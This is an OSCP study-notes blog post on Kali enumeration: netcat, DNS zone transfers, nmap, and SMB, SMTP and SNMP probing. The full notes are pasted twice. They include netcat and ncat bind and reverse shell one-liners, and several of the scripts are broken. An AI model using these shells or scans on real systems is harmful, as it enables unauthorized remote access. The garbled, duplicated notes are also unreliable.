my oscp note pwk videos
..............finding file on kali linux ............
which ============== which returns the pathnames of the files (or links) which would be executed in the current,
find / -name google -exec file {} \;= find is more agressive tools this is best for searchig any file and folders//
locate ============ writes file names matching at least one of the PATTERNs to standard output, one per line.
/.........................managing kali linux servicess Change kali linux password using shell ......................
passwd === this commnd change kali linux password
..........................SSH service start "using romete connections" ...............................
service ssh start === share remote connection and secure sockets shell
we can output netstat -antp | grep sshd "grep commond is show output"
..................... HTTP servicer start "Using Apache2" ....................
service apache2 start === we can open web server apache2
.................How to cheack ssh and http or apache2 service using shell ..............
"""netstat -antp | grep apache2""""
................................service management using other commnd line.............
# there are start any services such as apache2 , ssh etc......
/etc/init.d/ssh start ==== start ssh service
/etc/init.d/apache2 start ==== start apache service
............... service boot persistence .... service management using other commnd ................................
#there are start any service such as apache2 ,ssh, etc.
update-rc.d ssh enable
update-rc.d apache2 enable
.................Bash ...............born again shell .....................
#bash is scrpintg .
......................how to find website subDomains ........
#wget is using for download website index page ...........
....wget www.cisco.com..........
cat index.html | grep "href=" | cut -d"/" -f3 |
cat index.html | grep "href=" | cut -d"/" -f3 | grep cisco\.com |more
cat index.html | grep "href=" | cut -d"/" -f3 | grep cisco\.com | sort -u
//host www.cisco.com
//host www.cisco.com | grep "has address" | cut -d" " -f4
.................how to ping any website using /bin/bash ................
#!/bin/bash
for ip in $(seq 200 210); do
ping -c 1 192.168.31.$ip
done
#!/bin/bash
for ip in $(seq 200 210); do
ping -c 1 192.168.31.$ip | grep cut -d" " -f4 | cut -d":" -f1
done
......................Netcat ................/.........
netcat is network utility it can read and write both tcp and udp ..
netcat use check port open or close to read a banner...........
"..rdesktop -u <username> -p <password> <ip>"
....................Banner grabing....using netcat ./..........
connect to any port using netcat==== nc -nv <ip> <port n>
nc -nv 192.168.0.1 80
.....
..........................netcat using for chating or file trasfring.............................
...<target system > nc -nvlp 4444 === listing port forwording from victim machine
<attacker system> nc -nv <target ip address > 4444 (port nomber)
...................How to file using netcat....................
nc -nv 192.168.0.21 4444 < /root/share/windows/binary/wget.exe ============= file sharing command
...............................Bind Shell ........victime share your windows command executing port.................
victime side windows pc <<<<<<<<<.....nc -nvlp 4444 -e cmd.exe =sharing commnd terminal
attacker side linux pc <<<<<<<<<<<< nc -nv <ip 192.168.0.1> 4444
# there are conncet and any work here......................................................
.............................Reverse shell just like bind shell ......
reverse sheel in linux terminal forwing atterker your port forwording
in windows <<<<<<<<<< nc -nvlp 4444 >>>>>>>>>>>>
Linux system <<<<<<<<<, nc -nv <ip> 4444 -e /bin/bash >>>>>/bin/bash <terminal here
............................Secure Bind Shell ..............using ncat.............////////////////////
#Secure Bind Shell we receive encrypt pacate
target side >>>>>>>>>>>>>>ncat -nvlp 4444 -e cmd.exe --ssl
Attcker side >>>>>>>>>>>>>>>ncat -v 192.168.43.21 4444 --ssl
...............................Information gethering ...................
1) Active info gathering === ping, tracerout
2) Passive info gathering -== we collect info about target publicaly availble data. ex..seach engine ..
......................
.................................Google Searching Information gathering .....................
site: this is searching for subdomain exp >>>>>>>>>>>> site:"google.com"
-site : this is searching for subdomain exp >>>>>>>>>> -site:"www.google.com"
filetype: This is searchign pdf , ppt etc .... >>>>>> filetype:ppt "pentretion testign"
site:"microsoft.com" filetype:pdf "penetration testing"
////////////////////......................Google Hacking ................
intitle: >>> using legel privilege searching for accurate application
intitle:"wifi drivers for windows 7"
inurl: >>> inurl using for accurate url searching >>>>> .html , .php etc...
inurl:"control/userimage.html"
intext : write in characte
.................//Google Hacking DataBase GHDB......................
www.exploit-db.com >>>>>>>>>> this site upload latest exploit, payload for any vulnerable site
....................DNS Enumeration.........................
Dns enumeration > we discoverd name server ,mail server ,ip address.......
name service >>>>>>>>>>>>> host -t ns www.google.com
mail service >>>>>>>>>>>> host -t mx www.google.com
ip Address discover >>>>>>>>>>>> host www.google.com
............................................Forword DNS Lookup....................
we discoverd name server, mail server, ip address using bash script............
list.tst >>>>>>>>>> www , admin , ftp etc save this file list.tst
then open in bash script dns.sh
#!/bin/bash
for name in $(cat list.tst); do
host $name.google.com | grep "has address" | cut -d" " -f1,4
done
.........................Reverse DNS Lookups.............................................................
we discover ip address throw dns enumeration....................Bash script
#!/bin/bash
for ip in $(seq 1 100); do
host 192.168.43.$ip | grep "has address" | cut -d" " -f1,5
done
..................................Zone Transfer attack in name server........................
host -l <website name > < name server nam e>
zone trasfer attack >>>. host -l gpaurai.ac.in 172.217.160.238 ns67.domaincontrol.com
//////////////Bash script
#!/bin/bin
for name in $(host -t ns $1 |cut -d" " -f4); do
host -l $name $1 | grep "has address"
done
.........................................port scanning .........................
we scan tcp , udp port usign nmap ........................
////////.....................tcp connect scan ........................
tcp connect scan we scan all port fristly we three way handshake is sucessfully send .. we find port is open
scan network using netcat
nc -nvvz -w 1 192.168.43.98 1000-10000 >>>>>>>>>>>>> z >>> is using port scan
.............................tcp syn scan ............................
syn using send syn pacate on network
syn using bypass the firewalls ....................
.....................udp port scan using netcat ..............................
nc -unvvz -w 1 192.168.43.98 1000-10000 >>>>>>>>>>>>>>>>> udp port scan
.............................................Nmap port scanner ...............................
nmap man page =========/usr/share/nmap
..........................................Accountibility for your traffic ............................
.........................Network sweeping usign nmap............................
-oG >>>>>>>>>>> this commnd using save output in your computer
--top-port >>>>>>>>>> this command using look top open port >>>>>>>> --top-port 20
-p >>>>>>>>>>> using port scan
-sn >>>>>>>>>?
cut -d" " -f2 >>>>>>>>>this commond cut your output
nmap -sn 192.168.43.198 -p 1-1000 oG output.txt
..............................os detection banner grabbing .......using nmap...............
-sv >>>>>>>>>>>>>>> banner grabbing
-O >>>>>>>>>>>>>> os detection
-A >>>>>>>>>>>>>>> agresive scanning >>>>>>>>>>>> os , version, port all type inclue in -A
..............nmap nse script .......................................
/usr/share/nmap/script>>>>>>>>>>>>>>>>> here are all type script brute force , smd ectc.....................
.............................smb enumeration ............................
smb (server massage block) is a client server protocol that share printer port 445.............
smb port 139,445
netbios scaning tool == nbtscan <ip>
nmap -p 139,445 -A <ip> --open > =--open is show display
./////////////////////////........smb null session ..................
The null sessions are the unauthenticated sessions of the Server Message Block (SMB),
rpcclient -U "" <ip> <smb null session commond..⛲️
........................enum4linux .........................................
Enum4linux is a tool for enumerating information from Windows and Samba systems.
enum4linux -a <target ip>
.............................nmap smb nse script.................................
The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features.
It allows users to write (and share) simple scripts to automate a wide variety of networking tasks.
ls -l /usr/share/nmap|grep smb <show script in terminal > n
port 139 445 > smb enumeration port
nmap -p 139,445 --script smb-enum-users <ip>
............................smpt enumeration.........................................................
SMTP Enumeration. The Simple Mail Transport Protocol is used to send email messages as opposed to POP3 or IMAP
which can be used to both send and receive messages.
smtp is running port 25
nc -nv <ip> <port 25>
VRFY > this is commond shoe username.................
.........................smpt enumeration using bash scripting ............................
cat ram.txt >>>>>>>>>>>> bob ,root, backup
for user in (cat ram.txt); do
echo VRFY $user | nc -nv -w 1 192.168.2.19 > /root/Desktop/ra | grep "19";
done
.................................snmp enumeration...........................
SNMP Enumeration. SNMP (Simple Network Management Protocol) is an application layer protocol.
which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network
SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system.
port 161 162
.............................snmp mib..........................
MIB stands for Management Information Base and is a collection of information organized hierarchically.
nmap -sU --open 161 <ip> --open
onesixtyone > this tools is snmp scannig
onesixtyone -c <communityfile> file with community names to try i <hostip>
.......................snmpwalk.....................................
snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.
An object identifier (OID) may be given on the command line.
This OID specifies which portion of the object identifier space will be searched using GETNEXT requests.
tool:snmpwalk
......................vulnerbility scanning .....................................
Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes.
.........................vulnerbility scanning with nse script ..................................................😁️
nmap -v -p 80 --script all <ip>
which ============== which returns the pathnames of the files (or links) which would be executed in the current,
find / -name google -exec file {} \;= find is more agressive tools this is best for searchig any file and folders//
locate ============ writes file names matching at least one of the PATTERNs to standard output, one per line.
/.........................managing kali linux servicess Change kali linux password using shell ......................
passwd === this commnd change kali linux password
..........................SSH service start "using romete connections" ...............................
service ssh start === share remote connection and secure sockets shell
we can output netstat -antp | grep sshd "grep commond is show output"
..................... HTTP servicer start "Using Apache2" ....................
service apache2 start === we can open web server apache2
.................How to cheack ssh and http or apache2 service using shell ..............
"""netstat -antp | grep apache2""""
................................service management using other commnd line.............
# there are start any services such as apache2 , ssh etc......
/etc/init.d/ssh start ==== start ssh service
/etc/init.d/apache2 start ==== start apache service
............... service boot persistence .... service management using other commnd ................................
#there are start any service such as apache2 ,ssh, etc.
update-rc.d ssh enable
update-rc.d apache2 enable
.................Bash ...............born again shell .....................
#bash is scrpintg .
......................how to find website subDomains ........
#wget is using for download website index page ...........
....wget www.cisco.com..........
cat index.html | grep "href=" | cut -d"/" -f3 |
cat index.html | grep "href=" | cut -d"/" -f3 | grep cisco\.com |more
cat index.html | grep "href=" | cut -d"/" -f3 | grep cisco\.com | sort -u
//host www.cisco.com
//host www.cisco.com | grep "has address" | cut -d" " -f4
.................how to ping any website using /bin/bash ................
#!/bin/bash
for ip in $(seq 200 210); do
ping -c 1 192.168.31.$ip
done
#!/bin/bash
for ip in $(seq 200 210); do
ping -c 1 192.168.31.$ip | grep cut -d" " -f4 | cut -d":" -f1
done
......................Netcat ................/.........
netcat is network utility it can read and write both tcp and udp ..
netcat use check port open or close to read a banner...........
"..rdesktop -u <username> -p <password> <ip>"
....................Banner grabing....using netcat ./..........
connect to any port using netcat==== nc -nv <ip> <port n>
nc -nv 192.168.0.1 80
.....
..........................netcat using for chating or file trasfring.............................
...<target system > nc -nvlp 4444 === listing port forwording from victim machine
<attacker system> nc -nv <target ip address > 4444 (port nomber)
...................How to file using netcat....................
nc -nv 192.168.0.21 4444 < /root/share/windows/binary/wget.exe ============= file sharing command
...............................Bind Shell ........victime share your windows command executing port.................
victime side windows pc <<<<<<<<<.....nc -nvlp 4444 -e cmd.exe =sharing commnd terminal
attacker side linux pc <<<<<<<<<<<< nc -nv <ip 192.168.0.1> 4444
# there are conncet and any work here......................................................
.............................Reverse shell just like bind shell ......
reverse sheel in linux terminal forwing atterker your port forwording
in windows <<<<<<<<<< nc -nvlp 4444 >>>>>>>>>>>>
Linux system <<<<<<<<<, nc -nv <ip> 4444 -e /bin/bash >>>>>/bin/bash <terminal here
............................Secure Bind Shell ..............using ncat.............////////////////////
#Secure Bind Shell we receive encrypt pacate
target side >>>>>>>>>>>>>>ncat -nvlp 4444 -e cmd.exe --ssl
Attcker side >>>>>>>>>>>>>>>ncat -v 192.168.43.21 4444 --ssl
...............................Information gethering ...................
1) Active info gathering === ping, tracerout
2) Passive info gathering -== we collect info about target publicaly availble data. ex..seach engine ..
......................
.................................Google Searching Information gathering .....................
site: this is searching for subdomain exp >>>>>>>>>>>> site:"google.com"
-site : this is searching for subdomain exp >>>>>>>>>> -site:"www.google.com"
filetype: This is searchign pdf , ppt etc .... >>>>>> filetype:ppt "pentretion testign"
site:"microsoft.com" filetype:pdf "penetration testing"
////////////////////......................Google Hacking ................
intitle: >>> using legel privilege searching for accurate application
intitle:"wifi drivers for windows 7"
inurl: >>> inurl using for accurate url searching >>>>> .html , .php etc...
inurl:"control/userimage.html"
intext : write in characte
.................//Google Hacking DataBase GHDB......................
www.exploit-db.com >>>>>>>>>> this site upload latest exploit, payload for any vulnerable site
....................DNS Enumeration.........................
Dns enumeration > we discoverd name server ,mail server ,ip address.......
name service >>>>>>>>>>>>> host -t ns www.google.com
mail service >>>>>>>>>>>> host -t mx www.google.com
ip Address discover >>>>>>>>>>>> host www.google.com
............................................Forword DNS Lookup....................
we discoverd name server, mail server, ip address using bash script............
list.tst >>>>>>>>>> www , admin , ftp etc save this file list.tst
then open in bash script dns.sh
#!/bin/bash
for name in $(cat list.tst); do
host $name.google.com | grep "has address" | cut -d" " -f1,4
done
.........................Reverse DNS Lookups.............................................................
we discover ip address throw dns enumeration....................Bash script
#!/bin/bash
for ip in $(seq 1 100); do
host 192.168.43.$ip | grep "has address" | cut -d" " -f1,5
done
..................................Zone Transfer attack in name server........................
host -l <website name > < name server nam e>
zone trasfer attack >>>. host -l gpaurai.ac.in 172.217.160.238 ns67.domaincontrol.com
//////////////Bash script
#!/bin/bin
for name in $(host -t ns $1 |cut -d" " -f4); do
host -l $name $1 | grep "has address"
done
.........................................port scanning .........................
we scan tcp , udp port usign nmap ........................
////////.....................tcp connect scan ........................
tcp connect scan we scan all port fristly we three way handshake is sucessfully send .. we find port is open
scan network using netcat
nc -nvvz -w 1 192.168.43.98 1000-10000 >>>>>>>>>>>>> z >>> is using port scan
.............................tcp syn scan ............................
syn using send syn pacate on network
syn using bypass the firewalls ....................
.....................udp port scan using netcat ..............................
nc -unvvz -w 1 192.168.43.98 1000-10000 >>>>>>>>>>>>>>>>> udp port scan
.............................................Nmap port scanner ...............................
nmap man page =========/usr/share/nmap
..........................................Accountibility for your traffic ............................
.........................Network sweeping usign nmap............................
-oG >>>>>>>>>>> this commnd using save output in your computer
--top-port >>>>>>>>>> this command using look top open port >>>>>>>> --top-port 20
-p >>>>>>>>>>> using port scan
-sn >>>>>>>>>?
cut -d" " -f2 >>>>>>>>>this commond cut your output
nmap -sn 192.168.43.198 -p 1-1000 oG output.txt
..............................os detection banner grabbing .......using nmap...............
-sv >>>>>>>>>>>>>>> banner grabbing
-O >>>>>>>>>>>>>> os detection
-A >>>>>>>>>>>>>>> agresive scanning >>>>>>>>>>>> os , version, port all type inclue in -A
..............nmap nse script .......................................
/usr/share/nmap/script>>>>>>>>>>>>>>>>> here are all type script brute force , smd ectc.....................
.............................smb enumeration ............................
smb (server massage block) is a client server protocol that share printer port 445.............
smb port 139,445
netbios scaning tool == nbtscan <ip>
nmap -p 139,445 -A <ip> --open > =--open is show display
./////////////////////////........smb null session ..................
The null sessions are the unauthenticated sessions of the Server Message Block (SMB),
rpcclient -U "" <ip> <smb null session commond..⛲️
........................enum4linux .........................................
Enum4linux is a tool for enumerating information from Windows and Samba systems.
enum4linux -a <target ip>
.............................nmap smb nse script.................................
The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features.
It allows users to write (and share) simple scripts to automate a wide variety of networking tasks.
ls -l /usr/share/nmap|grep smb <show script in terminal > n
port 139 445 > smb enumeration port
nmap -p 139,445 --script smb-enum-users <ip>
............................smpt enumeration.........................................................
SMTP Enumeration. The Simple Mail Transport Protocol is used to send email messages as opposed to POP3 or IMAP
which can be used to both send and receive messages.
smtp is running port 25
nc -nv <ip> <port 25>
VRFY > this is commond shoe username.................
.........................smpt enumeration using bash scripting ............................
cat ram.txt >>>>>>>>>>>> bob ,root, backup
for user in (cat ram.txt); do
echo VRFY $user | nc -nv -w 1 192.168.2.19 > /root/Desktop/ra | grep "19";
done
.................................snmp enumeration...........................
SNMP Enumeration. SNMP (Simple Network Management Protocol) is an application layer protocol.
which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network
SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system.
port 161 162
.............................snmp mib..........................
MIB stands for Management Information Base and is a collection of information organized hierarchically.
nmap -sU --open 161 <ip> --open
onesixtyone > this tools is snmp scannig
onesixtyone -c <communityfile> file with community names to try i <hostip>
.......................snmpwalk.....................................
snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.
An object identifier (OID) may be given on the command line.
This OID specifies which portion of the object identifier space will be searched using GETNEXT requests.
tool:snmpwalk
......................vulnerbility scanning .....................................
Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes.
.........................vulnerbility scanning with nse script ..................................................😁️
nmap -v -p 80 --script all <ip>
Comments
Post a Comment